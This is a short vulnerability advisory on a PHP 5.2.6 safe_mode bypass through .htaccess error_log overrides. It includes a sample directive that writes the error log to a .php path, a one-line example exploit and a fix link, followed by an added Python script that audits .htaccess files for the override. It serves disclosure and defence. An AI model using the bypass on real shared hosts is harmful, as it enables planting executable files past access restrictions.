
PHP 5.2.6 (error_log) safe_mode bypass

Affected Software: PHP 5.2.6
Vendor: http://www.php.net

- --- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as modify the way the errors can be logged. This allows you to change and enhance error reporting to suit your needs.

- --- 1. error_log const. bypassed by php_admin_flag ---

The problem lies in the difference between enabling safe_mode globally in php.ini:

safe_mode = On

and declaring it via php_admin_flag:

php_admin_flag safe_mode On

When we create a PHP script in /www/ and try to call:

ini_set("error_log", "/hack/");

or put in /www/.htaccess:

php_value error_log "/hack/bleh.php"

Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

That was the result with safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On

in httpd.conf, we get only:

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

The .htaccess syntax

php_value error_log "/hack/blehx.php"

is allowed and bypasses safe_mode.

Example exploit:

error_log("", 0);

- --- 2. How to fix ---

Fixed in CVS:

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not rely on safe_mode as your main security measure.
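An added audit example, not part of the original advisory: it scans .htaccess contents for the php_value error_log override described above and marks targets that fall outside an approved log directory. The function names, the sample files and the approved directory /var/log/php are assumptions made for illustration, and relative targets are resolved against the .htaccess directory as a simplification.

```python
import posixpath
import re

# php_value error_log <target>, target optionally quoted (directive names are case-insensitive).
DIRECTIVE = re.compile(
    r"""^\s*php_value\s+error_log\s+(?:"([^"]*)"|'([^']*)'|(\S+))""", re.IGNORECASE)

def find_error_log_overrides(htaccess_text):
    """Return (line_number, target) for every error_log override in the text."""
    hits = []
    for number, line in enumerate(htaccess_text.splitlines(), start=1):
        match = DIRECTIVE.match(line)  # commented-out lines start with '#' and never match
        if match:
            hits.append((number, next(g for g in match.groups() if g is not None)))
    return hits

def outside_allowed(target, htaccess_dir, allowed_dirs):
    """True when the normalised target lies outside every approved log directory."""
    path = posixpath.normpath(posixpath.join(htaccess_dir, target))
    return not any(path == d or path.startswith(d.rstrip("/") + "/") for d in allowed_dirs)

def audit(files, allowed_dirs):
    """files maps an .htaccess path to its contents; returns one finding per override."""
    findings = []
    for path, text in sorted(files.items()):
        for number, target in find_error_log_overrides(text):
            findings.append({
                "file": path, "line": number, "target": target,
                "outside": outside_allowed(target, posixpath.dirname(path), allowed_dirs),
            })
    return findings

# Constructed sample input; /var/log/php is an assumed approved log directory.
SAMPLE = {
    "/www/.htaccess": 'Options -Indexes\nphp_value error_log "/hack/blehx.php"\n',
    "/www/app/.htaccess": "# php_value error_log /tmp/x\n"
                          "php_value error_log /var/log/php/app.log\n",
}
ALLOWED = ["/var/log/php"]

if __name__ == "__main__":
    for finding in audit(SAMPLE, ALLOWED):
        status = "OUTSIDE allowed dirs" if finding["outside"] else "ok"
        print(f'{finding["file"]}:{finding["line"]} error_log -> {finding["target"]} [{status}]')
```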